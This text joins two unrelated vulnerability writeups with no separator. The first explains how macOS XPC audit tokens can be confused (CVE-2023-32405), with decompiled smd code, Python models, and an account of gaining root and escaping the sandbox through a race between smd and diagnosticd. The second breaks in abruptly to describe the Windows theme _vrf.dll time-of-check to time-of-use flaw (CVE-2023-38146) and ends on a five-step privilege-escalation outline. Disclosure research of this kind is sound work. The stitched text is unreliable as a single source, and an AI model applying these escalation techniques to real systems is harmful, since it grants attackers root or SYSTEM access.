In this blog post, we'll describe a design issue in the way XPC connections are authorized in Apple's operating systems. We'll start by describing how XPC works and how it is implemented on top of mach messages (based on our reverse engineering). Then, we'll describe the vulnerability we found, which stems from implementing a (presumed to be) one-to-one communication channel on top of a communication channel that allows multiple concurrent senders. Next, we'll illustrate this issue with an example involving smd and diagnosticd on macOS. This instance was fixed in macOS 13.4 as CVE-2023-32405. As Apple did not apply a structural fix, but only fixed this instance, developers still need to keep this in mind when building XPC services, and researchers may be able to find more instances of this issue.
Background
XPC is an important inter-process communication technology in all of Apple's operating systems. XPC connections are very fast and efficient, and the API is easy to use. XPC messages are dictionaries with typed values, removing the need for custom (de)serialization code in most situations, which is often an area where vulnerabilities occur.
XPC is often used across different security boundaries, for example to implement a highly privileged daemon that can perform operations requested by apps. In these scenarios, authorization checks are very important for the security of the system. These checks could verify that the app is not sandboxed, is signed by a specific developer, holds a specific entitlement, and so on.
It is well documented that the process ID (PID), obtained for example with the function xpc_connection_get_pid, is not safe to use for such an authorization check: an application can send a message and immediately execute another process (in a way that keeps the same PID), hoping that the authorization check will inspect the new process instead. Instead, the function xpc_connection_get_audit_token should be used (which, annoyingly, is not part of the public XPC API on macOS). An audit token is a structure that contains not just the PID but also a PID version, which increases when spawning a new process, making it possible to distinguish the two and therefore identify the right process.
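The difference between a PID check and an audit token check can be illustrated with a small model. This is only a sketch and not XPC code: `AuditToken`, `ProcessTable` and both check methods are hypothetical names, and the token is reduced to the two fields discussed above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditToken:
    """Simplified stand-in for an audit token: only the fields discussed here."""
    pid: int
    pid_version: int


class ProcessTable:
    """Toy kernel state: which program image currently runs under each PID."""

    def __init__(self):
        self._procs = {}  # pid -> (pid_version, is_privileged)

    def spawn(self, pid, is_privileged):
        # Replacing the image (exec-style) keeps the PID but bumps the version.
        version = self._procs.get(pid, (0, False))[0] + 1
        self._procs[pid] = (version, is_privileged)
        return AuditToken(pid, version)

    def privileged_by_pid(self, pid):
        # Racy: answers for whatever runs under this PID right now.
        return self._procs[pid][1]

    def privileged_by_token(self, token):
        # Only answers for the exact process instance that sent the message.
        version, is_privileged = self._procs[token.pid]
        return is_privileged and version == token.pid_version


table = ProcessTable()
sender = table.spawn(pid=500, is_privileged=False)  # attacker sends a request
table.spawn(pid=500, is_privileged=True)            # ...then execs a trusted binary

pid_check = table.privileged_by_pid(sender.pid)     # inspects the new image
token_check = table.privileged_by_token(sender)     # version no longer matches
```

In this model the PID-based check approves the request because it looks at the replacement image, while the token-based check rejects it because the PID version recorded with the message is stale.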
In this blog post, we'll describe that xpc_connection_get_audit_token may also use the wrong process in certain situations, and that xpc_dictionary_get_audit_token is the better choice in those cases. To explain why, we first have to explain the way XPC is implemented.
XPC is built on top of mach messages. While this part of the mach kernel is open source, XPC is not, so to figure out how to (for example) establish an XPC connection or serialize an XPC message, we have had to reverse engineer the libraries implementing this. Therefore, keep in mind that this contains some guesswork and Apple may change the implementation at any moment.
Mach messages 101
Mach messages are sent over a mach port, which is a single receiver, multiple sender communication channel built into the mach kernel. Multiple processes can send messages to a mach port, but at any point only a single process can read from it. Just like file descriptors and sockets, mach ports are allocated and managed by the kernel and processes only see an integer, which they can use to indicate to the kernel which of their mach ports they want to use.
Mach messages are sent or received using the mach_msg function (which is essentially a syscall). When sending, the first argument for this call must be the message, which has to start with a mach_msg_header_t followed by the actual payload.
The process that can receive messages on a mach port is said to hold the receive right, while the senders hold a send or a send-once right. Send-once, as the name implies, can only be used to send a single message and then is invalidated.
The fact that mach ports only allow messages in a single direction may sound quite limited, but of course there are ways to deal with this. The main way bidirectional communication can be established is by transferring these rights to another process using a mach message. A receive or send-once right can be moved to another process and a send right can be moved or copied.
One place where this is used is for a field in the mach message header called the reply port (msgh_local_port). A process can specify a mach port with this field where the receiver of the message can send a reply to this message. The bitflags in msgh_bits can be used to indicate that a send-once right should be derived and transferred for this port (MACH_MSG_TYPE_MAKE_SEND_ONCE).
The other fields of the message header are:
msgh_size: the size of the entire packet.
msgh_remote_port: the port on which this message is sent.
msgh_id: the ID of this message, which is interpreted by the receiver.
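The header fields described above can be sketched with Python's ctypes. The field order and 32-bit widths follow our understanding of the declaration in `<mach/message.h>` in recent XNU sources, so treat the layout as an assumption; `ExampleMessage`, the port names and the message ID are placeholders, and nothing here actually calls mach_msg.

```python
import ctypes

# Port right dispositions as defined in <mach/message.h>.
MACH_MSG_TYPE_COPY_SEND = 19
MACH_MSG_TYPE_MAKE_SEND_ONCE = 21


def MACH_MSGH_BITS(remote, local):
    """Pack the remote and local port dispositions into msgh_bits."""
    return remote | (local << 8)


class mach_msg_header_t(ctypes.Structure):
    _fields_ = [
        ("msgh_bits", ctypes.c_uint32),
        ("msgh_size", ctypes.c_uint32),
        ("msgh_remote_port", ctypes.c_uint32),
        ("msgh_local_port", ctypes.c_uint32),
        ("msgh_voucher_port", ctypes.c_uint32),
        ("msgh_id", ctypes.c_int32),
    ]


class ExampleMessage(ctypes.Structure):
    """Hypothetical message: the header followed by an 8-byte payload."""
    _fields_ = [("header", mach_msg_header_t), ("payload", ctypes.c_char * 8)]


msg = ExampleMessage()
# Send on a copied send right; derive a send-once right for the reply port.
msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND,
                                      MACH_MSG_TYPE_MAKE_SEND_ONCE)
msg.header.msgh_size = ctypes.sizeof(ExampleMessage)
msg.header.msgh_remote_port = 0x1234  # placeholder port name, not a real right
msg.header.msgh_local_port = 0x5678   # placeholder reply port name
msg.header.msgh_id = 42               # arbitrary ID, interpreted by the receiver
msg.payload = b"hello"
```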
XPC
To establish an XPC connection there are multiple options (mach services, embedded XPC services, using endpoints, etc.). We'll focus on an app establishing an XPC connection to a mach service here. Mach services use a service name on which they are reachable. This name should be specified in the MachServices key in the launch daemon configuration. For example, smd, the service management daemon, specifies the name com.apple.xpc.smd:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>AuxiliaryBootstrapperAllowDemand</key>
    <true/>
    <key>EnablePressuredExit</key>
    <true/>
    <key>Label</key>
    <string>com.apple.xpc.smd</string>
    <key>LaunchEvents</key>
    <dict>
        <key>com.apple.fsevents.matching</key>
        <dict>
            <key>com.apple.xpc.smd.WatchPaths</key>
            <dict>
                <key>Path</key>
                <string>/Library/LaunchDaemons/</string>
            </dict>
        </dict>
    </dict>
    <key>MachServices</key>
    <dict>
        <key>com.apple.xpc.smd</key>
        <true/>
    </dict>
    <key>ProcessType</key>
    <string>Adaptive</string>
    <key>Program</key>
    <string>/usr/libexec/smd</string>
</dict>
</plist>
When a launch agent or daemon launches, it generates a new mach port and sends a send right to this port to the bootstrap service (part of launchd). We'll refer to this as the service port.
To connect to a mach service, the client asks the bootstrap service for that name. If that name is registered, the bootstrap service duplicates the send right and sends it back to the application.
Once the app has the service port, it generates two new mach ports: the server port and the client port. Then, it sends a message to the service port (with an msgh_id of 0x77303074, or 'w00t') in which it moves the receive right for the server port and copies a send right for the client port. If the service accepts the connection, it starts listening for messages on the server port and it can use the client port to send messages to the app.
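The bookkeeping of this handshake can be modelled in a few lines. This is a simplified sketch of which rights end up where, not the real protocol: `Process` and `connect` are hypothetical names, and ports are represented by plain strings.

```python
from dataclasses import dataclass, field

XPC_CONNECT_MSGH_ID = 0x77303074  # msgh_id quoted in the text


@dataclass
class Process:
    name: str
    receive_rights: set = field(default_factory=set)
    send_rights: set = field(default_factory=set)


def connect(client, service):
    """Model the rights transferred by the connection request."""
    server_port = f"{client.name}:server"
    client_port = f"{client.name}:client"
    # The client allocates both ports, so it starts with both receive rights.
    client.receive_rights.update({server_port, client_port})
    client.send_rights.add(server_port)
    # The request moves the server port's receive right to the service...
    client.receive_rights.remove(server_port)
    service.receive_rights.add(server_port)
    # ...and copies a send right for the client port.
    service.send_rights.add(client_port)
    return server_port, client_port


app = Process("app")
smd = Process("smd")
server_port, client_port = connect(app, smd)
msgh_id_ascii = XPC_CONNECT_MSGH_ID.to_bytes(4, "big").decode("ascii")
```

After the call, the service can receive on the server port and send on the client port, while the app keeps the receive right for the client port. Decoding the message ID as big-endian ASCII yields the four-character tag mentioned in the text.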
As you can see from this description, normal XPC mach messages don't use the reply port field. But it is used for XPC messages that expect a reply (xpc_connection_send_message_with_reply and xpc_connection_send_message_with_reply_sync). Replies and normal XPC messages are therefore transferred over completely different mach ports. This way the implementation can keep track of multiple pending replies and differentiate them from normal messages automatically.
Now where do audit tokens come in? Well, when receiving a mach message, an application can add a flag that asks the kernel to append certain trailers to the received message. The flag MACH_RCV_TRAILER_AUDIT asks the kernel to append a trailer that contains the audit token of the sender of that message. libxpc sets this flag, so when a message comes in, the function _xpc_connection_set_creds copies the audit token from the trailer to the XPC connection object.
Vulnerability
We have just seen the following:
Mach ports are single receiver, multiple sender.
An XPC connection's audit token is copied from the most recently received message.
Obtaining the audit token of an XPC connection is critical to many security checks.
This led us to the research question: can we set up an XPC connection where multiple different processes are sending messages, leading to a message from one process being checked with the audit token of a different process?
XPC's abstraction is a one-to-one connection, but it is built on top of a technology which can have multiple senders. As with many security issues, we are trying to break the abstraction and see what might be possible.
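The mismatch between the abstraction and the transport can be shown with a toy receiver. The `Connection` class below is a hypothetical model of the behaviour described above (one stored token, overwritten on every receive); tokens are reduced to a `(name, uid)` tuple.

```python
class Connection:
    """Toy receiver side of a connection: remembers only the latest sender."""

    def __init__(self):
        self.audit_token = None
        self.log = []

    def receive(self, sender_token, body):
        # Every incoming message overwrites the connection-wide audit token.
        self.audit_token = sender_token
        self.log.append((sender_token, body))


conn = Connection()
conn.receive(("app", 501), "hello")     # message from the unprivileged app
conn.receive(("daemon", 0), "status")   # another sender on the same port

# Anyone who now asks the connection "who is my peer?" gets the daemon,
# even when the question is about the app's earlier message.
token_seen_for_app_message = conn.audit_token
```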
We established a few things that wouldn't work:
Audit tokens are often used for an authorization check to decide whether to accept a connection. As this happens using a message to the service port, there is no connection established yet. More messages on this port will just be handled as additional connection requests. So any checks before accepting a connection are not vulnerable (this also means that within -listener:shouldAcceptNewConnection: the audit token is safe). We are therefore looking for XPC connections that verify specific actions.
XPC event handlers are handled synchronously. This means that the event handler for one message must be completed before calling it for the next one, even on concurrent dispatch queues. So inside an XPC event handler the audit token cannot be overwritten by other normal (non-reply!) messages.
This gave us two ideas for how this might still be possible:
A service that calls xpc_connection_get_audit_token while not inside the event handler for a connection.
A service that receives a reply concurrently with a normal message.
Variant 1: calling xpc_connection_get_audit_token outside of an event handler
The first case we looked at is finding daemons that check an audit token asynchronously from the XPC event handler. To summarize the requirements, this requires:
Two mach services A and B that we can both connect to (based on the sandbox profile and the authorization checks before accepting the connection).
A must have an authorization check for a specific action that B can pass (but our app can't).
For this authorization check, A obtains the audit token asynchronously, for example by calling xpc_connection_get_audit_token from dispatch_async.
We found a hit for these requirements with A as smd and B as diagnosticd.
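The requirements above can be modelled deterministically. In this sketch, `Service` is a hypothetical stand-in for A, a `deque` of callables plays the role of the second dispatch queue, and the audit token is reduced to a UID; the real race is timing-dependent, whereas the interleaving here is forced by the order of the calls.

```python
from collections import deque

APP_UID, ROOT_UID = 501, 0


class Service:
    """Toy service A: authorizes requests in a deferred block."""

    def __init__(self):
        self.connection_token = None  # overwritten by every received message
        self.deferred = deque()       # stand-in for another dispatch queue
        self.performed = []

    def receive(self, sender_uid, body):
        self.connection_token = sender_uid
        if body == "privileged-action":
            # The check is queued and reads the connection token when it runs.
            self.deferred.append(lambda: self._check_and_perform(body))

    def _check_and_perform(self, body):
        if self.connection_token == ROOT_UID:  # "is the peer root?"
            self.performed.append(body)

    def drain(self):
        while self.deferred:
            self.deferred.popleft()()


service = Service()
service.receive(APP_UID, "privileged-action")  # our request, check is deferred
service.receive(ROOT_UID, "status-update")     # B's message on the same port
service.drain()                                # the check now sees B's token

control = Service()
control.receive(APP_UID, "privileged-action")  # same request, no interference
control.drain()
```

With B's message interleaved, the deferred check approves the app's request; in the control run without it, the request is rejected.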
Exploiting smd
smd handles features like login items and privileged helper tools. For example, the function SMJobBless can be used to install a new privileged helper tool: a command line executable included in an application that gets installed to run as root. The app can use it to perform the operations that require root without having to run the entire app as root.
Normally, to use SMJobBless, an application includes the tool it wants to install inside Contents/Library/LaunchServices/ in its own app bundle and sets the key SMPrivilegedExecutables in its Info.plist file. To install the tool, it must ask the user to authenticate, which results in an authorization reference if it succeeds. That authorization reference must then be passed to SMJobBless. The goal of this exploit is to perform the installation of a privileged helper tool without obtaining an authorization reference first.
Internally, SMJobBless works by communicating with smd over XPC. A client connected to smd can perform multiple actions. The message must specify the key "routine" to indicate which operation to perform. Routine 1004 is the one eventually called by SMJobBless. For this routine, dispatch_async is used to execute a block on a different dispatch queue.
The function named handle_bless includes a call to connection_is_unauthorized, which allows the operation to be performed if one of three checks passes:
The requesting application is running as root.
The requesting application has the entitlement com.apple.private.xpc.unauthenticated-bless.
The request contains an authorization reference for the name "com.apple.ServiceManagement.blesshelper" (this is what SMJobBless obtains).
__int64 __fastcall connection_is_unauthorized(void *connection, void *message, char *authorization_name, OSStatus *error)
{
  [...]
  v22 = authorization_name;
  v5 = objc_retain(connection);
  v6 = objc_retain(message);
  memset(audit_token, 170, sizeof(audit_token));
  xpc_connection_get_audit_token(v5, audit_token);
  v7 = 0;
  // [1]: field 1 contains the UID, UID == 0 means root
  if (audit_token[1]) {
    v8 = error;
    // [2]: Has a specific entitlement
    v9 = (void *)xpc_connection_copy_entitlement_value(v5, "com.apple.private.xpc.unauthenticated-bless");
    v10 = &_xpc_bool_true;
    if (v9 != &_xpc_bool_true) {
      v11 = v9;
      length = 0LL;
      // [3]: Passed in an authorization reference for the specified name
      data = (const AuthorizationExternalForm *)xpc_dictionary_get_data(v6, "authref", &length);
      v7 = 81;
      if (data && length == 32) {
        authorization = 0LL;
        v13 = AuthorizationCreateFromExternalForm(data, &authorization);
        if (v13) {
          *v8 = v13;
          v7 = 153;
        } else {
          v17 = 0LL;
          v18 = 0LL;
          v16 = v22;
          *(_QWORD *)&rights.count = 0xAAAAAAAA00000001LL;
          rights.items = (AuthorizationItem *)&v16;
          v14 = AuthorizationCopyRights(authorization, &rights, 0LL, 3u, 0LL);
          if (v14 == -60005) {
            v7 = 1;
          } else if (v14) {
            *v8 = v14;
            v7 = 153;
          } else {
            v7 = 0;
          }
          AuthorizationFree(authorization, 0);
        }
      }
      v10 = v11;
    }
  } else {
    v10 = 0LL;
  }
  objc_release(v10);
  objc_release(v6);
  objc_release(v5);
  return v7;
}
In order to perform our attack, we need a second service too. We picked diagnosticd because it runs as root, but many other options likely exist. This daemon can be used to monitor a process. Once monitoring has started, it will send multiple messages per second about, for example, the memory use and CPU usage of the monitored process.
To perform our attack, we establish our connection to smd by following the normal XPC protocol. Then, we establish a connection to diagnosticd, but instead of generating two new mach ports and sending those, we replace the client port send right with a copy of the send right we have for the connection to smd. What this means is that we can send XPC messages to diagnosticd, but any messages diagnosticd sends go to smd. For smd, both our and diagnosticd's messages appear to arrive on the same connection.
Next, we ask diagnosticd to start monitoring our (or any active) process and we spam routine 1004 messages to smd.
This creates a race condition that needs to hit a very specific window in handle_bless. We need the call to xpc_connection_get_pid at [1] below to return the PID of our own process, as the privileged helper tool is in our app bundle. However, the call to xpc_connection_get_audit_token inside the connection_is_unauthorized function at [2] must use the audit token of diagnosticd.
__int64 __fastcall handle_bless([...])
{
  [...]
  err = 0;
  pid = xpc_connection_get_pid(connection); // [1] Must be our process
  memset(&audit_token, 170, sizeof(audit_token));
  xpc_dictionary_get_audit_token(message, &audit_token);
  v129 = connection;
  // [2] Must use diagnosticd
  is_unauthorized = connection_is_unauthorized(connection, message, "com.apple.ServiceManagement.blesshelper", &err);
  if (is_unauthorized) {
    v15 = is_unauthorized;
    send_error_reply(message, is_unauthorized, err);
LABEL_3:
    v16 = 0LL;
    goto LABEL_4;
  }
  string = xpc_dictionary_get_string(message, "identifier");
  if (!string) {
    v15 = 22;
    goto LABEL_3;
  }
  v135 = string;
  path_of_pid = get_path_of_pid(pid);
  if (!path_of_pid) {
    v15 = 2;
    goto LABEL_3;
  }
  v22 = (id)path_of_pid;
  property = (const char *)xpc_bundle_get_property(path_of_pid, 9LL);
  v15 = 107;
  if (!property)
    goto LABEL_48;
  v24 = sub_10000447A("%s/Library/LaunchServices/%s", property, v135);
While that looks difficult to hit, smd doesn't close the connection once it receives a malformed or unauthorized message, so we can keep retrying.
Once our privileged helper tool is installed, we simply connect and send a message to get it to launch, and we have gained code execution as root!
We originally discovered this vulnerability on macOS Big Sur. It still worked on macOS Ventura, but Apple had added notifications about added launch agents, making the attack no longer stealthy. However, as these notifications are only shown afterwards, the attack has already succeeded at that point.
Sandbox escape?
Privilege escalation is fun, but it's even more fun if we can escape the sandbox at the same time. Our smd exploit kept working perfectly if we enabled the "App Sandbox" checkbox in Xcode, as both mach services can be reached by sandboxed apps.
However, the practical impact of this as a sandbox escape is very limited. Due to the requirement to embed the privileged helper tool in the app and set the Info.plist key, we cannot escape from an arbitrary compromised application that has enabled the Mac Application Sandbox (and definitely not from a compromised browser renderer). We could attempt to submit an app like this to the Mac App Store, but static checks on the application will almost certainly find and reject our embedded helper tool (we didn't test this, as testing against the Mac App Store review process tends to get one on Apple's bad side).
This leaves just one scenario: we can construct an application that we offer as a download outside of the Mac App Store that is ostensibly sandboxed, but which turns out to escape its sandbox when launched and which even elevates its privileges to root. The number of users who will check if an application they have downloaded from the internet is sandboxed before running it will likely be extremely low.
Variant 2: reply forwarding
We also identified a second variant that can also modify the audit token. As mentioned before, the handler for events on an XPC connection is never executed multiple times concurrently. However, XPC reply messages are handled differently. Two functions exist for sending a message that expects a reply:
void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message, dispatch_queue_t replyq, xpc_handler_t handler), in which case the XPC message is received and parsed on the specified queue.
xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message), in which case the XPC message is received and parsed on the current dispatch queue.
Therefore, XPC reply packets may be parsed while an XPC event handler is executing. While _xpc_connection_set_creds does use locking, this only prevents partial overwriting of the audit token; it does not lock the entire connection object. This makes it possible to replace the audit token in between the parsing of a packet and the execution of its event handler.
For this scenario we would need:
As before, two mach services A and B that we can both connect to.
Again, A must have an authorization check for a specific action that B can pass (but our app can't).
A sends us a message that expects a reply.
We can send a message to B that it will reply to.
We wait for A to send us a message that expects a reply (1). Instead of replying, we take the reply port and use it for a message we send to B (2). Then, we send a message that uses the forbidden action and hope that it arrives concurrently with the reply from B (3).
While we have confirmed this variant works using custom mach services, we did not find any practical examples with security impact.
More impact?
We quickly found one instance of the first variant in smd (which affects only macOS), but does that make it a design issue in XPC or an error in smd? Arguing that it's a design issue becomes a lot easier with more examples, preferably also on other platforms like iOS.
We spent a long time trying to find other instances, but the conditions made it difficult to search for them either statically or dynamically. To search for asynchronous calls to xpc_connection_get_audit_token, we used Frida to hook this function and check whether the backtrace lacks _xpc_connection_mach_event (which means the call is not made from an event handler). But this only finds calls in the process we have currently hooked and from the actions that are actively used. Analysing all reachable mach services in IDA/Ghidra was very time intensive, especially when calls involved the dyld shared cache. We tried scripting this to look for calls to xpc_connection_get_audit_token reachable from a block submitted using dispatch_async, but parsing blocks and calls passing into the dyld shared cache made this difficult too. After spending a while on this, we decided it would be better to submit what we had.
While this did not result in any further instances of this issue, the time we spent reverse engineering XPC services did lead us to discover CVE-2023-32437 in nsurlsessiond, but that's for another writeup.
The fix
In the end, we reported the general issue and the specific issue in smd. Apple fixed it only in smd by replacing the call to xpc_connection_get_audit_token with xpc_dictionary_get_audit_token.
The function xpc_dictionary_get_audit_token copies the audit token from the mach message on which this XPC message was received, meaning it is not vulnerable. However, just like xpc_connection_get_audit_token, this is not part of the public API. For the higher level NSXPCConnection API, no clear method exists to get the audit token of the current message, as this abstracts away all messages into method calls.
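Why a per-message token resists the interleaving can be sketched with a small model. `Message` and `FixedService` are hypothetical names, the token is reduced to a UID, and a `deque` stands in for the second dispatch queue; the only point is that the deferred check reads the token stored with the message rather than the one stored on the connection.

```python
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Message:
    sender_uid: int  # stand-in for the audit token stored with the message
    body: str


class FixedService:
    def __init__(self):
        self.connection_token = None
        self.deferred = deque()
        self.performed = []

    def receive(self, message):
        # The connection-wide token is still overwritten by every message.
        self.connection_token = message.sender_uid
        if message.body == "privileged-action":
            self.deferred.append(message)

    def drain(self):
        while self.deferred:
            message = self.deferred.popleft()
            # Check the token that arrived with this particular message.
            if message.sender_uid == 0:
                self.performed.append(message.body)


attacked = FixedService()
attacked.receive(Message(501, "privileged-action"))  # request from the app
attacked.receive(Message(0, "status-update"))        # root daemon interleaves
attacked.drain()

legitimate = FixedService()
legitimate.receive(Message(0, "privileged-action"))  # request from root itself
legitimate.drain()
```

The interleaved message still changes `connection_token`, but the authorization decision no longer depends on it.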
It is unclear to us why Apple didn't apply a more general fix, for example dropping messages that don't match the saved audit token of the connection. There may be scenarios where the audit token of a process legitimately changes but the connection should stay open (for example, calling setuid changes the UID field), but changes like a different PID or PID version are unlikely to be intended.
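A minimal sketch of such a general fix, under our own assumptions: the connection pins the PID and PID version of the first message it sees and drops anything from a different process instance, while tolerating a changed UID. `AuditToken` and `PinnedConnection` are hypothetical names; this is not how libxpc behaves.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditToken:
    uid: int
    pid: int
    pid_version: int


class PinnedConnection:
    """Pins the peer identity on the first message and drops foreign senders."""

    def __init__(self):
        self.peer = None
        self.delivered = []
        self.dropped = []

    def receive(self, token, body):
        identity = (token.pid, token.pid_version)
        if self.peer is None:
            self.peer = identity
        if identity != self.peer:
            self.dropped.append(body)   # different process instance: drop
            return False
        self.delivered.append(body)     # same instance, UID may have changed
        return True


conn = PinnedConnection()
first = conn.receive(AuditToken(uid=501, pid=700, pid_version=3), "hello")
after_setuid = conn.receive(AuditToken(uid=0, pid=700, pid_version=3), "again")
foreign = conn.receive(AuditToken(uid=0, pid=88, pid_version=1), "status")
```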
In any case, this issue still remains with iOS 17 and macOS 14, so if you want to go and look for it, good luck!
Microsoft published a patch for CVE-2023-38146 on Patch Tuesday of September 2023. The advisory for this vulnerability mentions that the impact is remote code execution, which was demonstrated by @gabe_k, the researcher who first reported the vulnerability to Microsoft in May of 2023. Gabe's ThemeBleed writeup and proof-of-concept demonstrate how an attacker might exploit the vulnerability for code execution by luring an unsuspecting victim into opening a booby-trapped .themepack file.
We had also identified and reported the same vulnerability in August of 2023. But, our proof-of-concept exploit took a slightly different path with a distinct outcome. It turns out that it is possible to exploit this vulnerability for initial access as well as privilege escalation!
In this writeup, we'll cover the code path that we've identified to the vulnerability as well as how we exploited it for privilege escalation.
Background
Windows users can modify their desktop environment to better suit their preferred style. This is done through the use of theme files which are simple INI-style config files with the .theme extension. These files consist of key-value entries for text colors, scrollbar colors, desktop icons and the like. Next to simple graphical elements, Windows themes must contain an entry denoting the theme's associated "Visual Styles". This entry can be used to specify color and sizing information for UI elements. Optionally, it can also specify a Path entry pointing to an .msstyles file. These are Portable Executable (PE) files that should only contain resources which control the styling of "deeper" elements of the operating system's UI, such as windows and buttons. Once a user chooses a theme, if the [VisualStyles]\Path entry exists and points to a valid .msstyles file, it will be stored in their registry hive at HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName. Usually, it is set to the visual styles file for the Windows default theme, Aero.msstyles.
Any user may use any theme or modify one to their heart's content, but they may not use any visual styles files that are not provided by Microsoft. That is because .msstyles PEs are signed and validated at some point during processing.
While investigating signature verification routines in Windows 11, we noticed an oddity in how theme loading code handled .msstyles files. This oddity was our path to the discovery of CVE-2023-38146, which seems to stem from some code changes to Windows theme loading that were introduced in Windows 11.
User theme loading
Naturally, a user's theme should be applied to their desktop session when they log in or whenever it needs to be re-applied. This process is performed by Winlogon as part of the user's desktop creation and in response to a number of events that may occur in a user's session.
On a vulnerable build of Windows 11, Winlogon (re-)loads the currently logged-in user's theme as follows:
1. Some event that requires (re-)loading the current user's theme occurs (e.g. user logs on), causing winlogon.exe to invoke a series of functions eventually calling UXInit!CThemeServicesInit::LoadCurrentTheme.
2. UXInit!CThemeServicesInit::LoadCurrentTheme reads the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName for the user who is logging in to obtain the path to the theme's visual style file (the .msstyles file).
3. Eventually, UXInit!LoadThemeLibrary is called to load the theme's .msstyles file using LoadLibraryEx while specifying the LOAD_LIBRARY_AS_DATAFILE flag to ensure that no code it may contain is executed. Afterwards, the loaded .msstyles module's PACKTHEM_VERSION resource section is read. This is expected to contain a version number represented as a 2-byte integer.
4. If the value is equal to 999 (0x03e7), the function UXInit!ReviseVersionIfNecessary checks if the .msstyles path followed by _vrf.dll exists. For example, if the .msstyles file is located at C:\a.msstyles, then the function would check for the existence of C:\a.msstyles_vrf.dll.
5. If this path exists, its signature is verified for validity.
6. If that signature verification passes, the _vrf.dll file is loaded into winlogon.exe and the function <loaded_vrf_dll>!VerifyThemeVersion is called.
It is worth noting that all of the steps above are executed before any validation of the embedded .msstyles file signature.
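The version check and the path derivation from the steps above can be written down as a short sketch. The function names are hypothetical, and reading the 2-byte version as little-endian is an assumption of this example rather than something we verified.

```python
PACKTHEM_VERSION_TRIGGER = 999  # 0x03e7, the value named in the text


def vrf_dll_path(msstyles_path):
    """Return the companion DLL path that is checked for a .msstyles path."""
    return msstyles_path + "_vrf.dll"


def parse_packthem_version(resource_bytes):
    """Read the 2-byte version; little-endian is an assumption of this sketch."""
    return int.from_bytes(resource_bytes[:2], "little")


def should_check_vrf_dll(resource_bytes):
    """True when the version value sends the loader down the _vrf.dll path."""
    return parse_packthem_version(resource_bytes) == PACKTHEM_VERSION_TRIGGER


example_path = vrf_dll_path(r"C:\a.msstyles")
triggers = should_check_vrf_dll(bytes([0xE7, 0x03]))
ignored = should_check_vrf_dll(bytes([0x04, 0x00]))
```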
Vulnerability
In the process above, steps (5) and (6) must be performed as one atomic operation from the point of view of the filesystem with no modifications being allowed to the _vrf.dll file in between. Otherwise, it is possible to swap the _vrf.dll file after step (5) but before step (6), which would be a Time-of-check to time-of-use (TOCTOU) vulnerability.
And this is exactly the vulnerability as can be seen in the decompilation of UXInit!ReviseVersionIfNecessary (irrelevant parts omitted for brevity):
// ...snip...
if (!PathFileExistsW(vrf_file_path)) // [1]
  return 0x80004005;
*&themeSig_object = &CThemeSignature::`vftable`;
*(&themeSig_object + 1) = 0i64;
v16[0] = 0ui64;
CThemeSignature::_Init(&themeSig_object, v7, v8);
err = CThemeSignature::Verify(&themeSig_object, vrf_file_path); // [2]
CThemeSignature::~CThemeSignature(&themeSig_object);
if ((err & 0x80000000) != 0) {
  // ...snip...
  // Do further checks using NtGetCachedSigningLevel
  // ...snip...
}
vrf_library = LoadLibraryW(vrf_file_path); // [3]
v11 = vrf_library;
if (!vrf_library)
  return 0x80004005;
VerifyThemeVersion = GetProcAddress(vrf_library, "VerifyThemeVersion");
memset(v16, 0, 20);
themeSig_object = xmmword_180028E88;
err = VerifyThemeVersion();
// ...snip...
The function will first check that the _vrf.dll file exists [1], then its signature is verified [2]. Next, LoadLibraryW will open the file again [3]. Because no locking is applied to the file between [2] and [3], it may be modified between these steps. By first placing a visual styles file that is properly signed and setting the current theme to use that path, and then replacing it at just the right moment with an arbitrary DLL, it is possible to load that DLL into winlogon.exe, executing its code as SYSTEM.
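The check-then-reopen pattern can be reproduced with ordinary files. This is a model of the bug class, not of the Windows code: a hash allow-list stands in for signature verification, `racy_load` and `safe_load` are hypothetical names, and the callback marks the window in which an attacker can replace the file.

```python
import hashlib
import os
import tempfile

TRUSTED = b"signed library"
MALICIOUS = b"attacker library"
# Assumption: a hash allow-list stands in for real signature verification.
TRUSTED_DIGESTS = {hashlib.sha256(TRUSTED).hexdigest()}


def is_trusted(data):
    return hashlib.sha256(data).hexdigest() in TRUSTED_DIGESTS


def racy_load(path, between_check_and_use=lambda: None):
    """Check the path, then reopen it: the file may change in between."""
    with open(path, "rb") as f:
        if not is_trusted(f.read()):
            return None
    between_check_and_use()      # window in which the file can be replaced
    with open(path, "rb") as f:  # second, independent read of the same path
        return f.read()


def safe_load(path, between_check_and_use=lambda: None):
    """Read once and use exactly the bytes that were verified."""
    with open(path, "rb") as f:
        data = f.read()
    if not is_trusted(data):
        return None
    between_check_and_use()
    return data


def write(path, data):
    with open(path, "wb") as f:
        f.write(data)


with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "a.msstyles_vrf.dll")

    write(target, TRUSTED)
    racy_result = racy_load(target, lambda: write(target, MALICIOUS))

    write(target, TRUSTED)
    safe_result = safe_load(target, lambda: write(target, MALICIOUS))
```

In the racy variant the verified content and the loaded content come from two separate reads of the same path, so the swap goes unnoticed; the safe variant only ever uses the bytes it verified.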
Exploitation
In order to successfully exploit the TOCTOU vulnerability, one would have to race against the vulnerable code path as it is repeatedly invoked while constantly switching between a properly signed visual styles file and a malicious one.
This means that a method to trigger the vulnerable code path in winlogon.exe repeatedly and quickly is necessary to improve the chances of a successful race in a short time window. Alternatively, a way to increase the race window duration or even skip it altogether would be sufficient as long as it is possible to trigger the vulnerable code path at least once.
Regardless of the specifics, the exploit outline would be:
1. Prepare a .msstyles file with a PACKTHEM_VERSION of 999 at some path $x.
2. Change the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName to point to $x.
3. Put a validly signed .msstyles file at $x_vrf.dll.
4. Trigger the theme loading code path.
5. Replace the file $x_vrf.dll with our malicious version, hopefully between the signature verification check and the LoadLibraryW call.
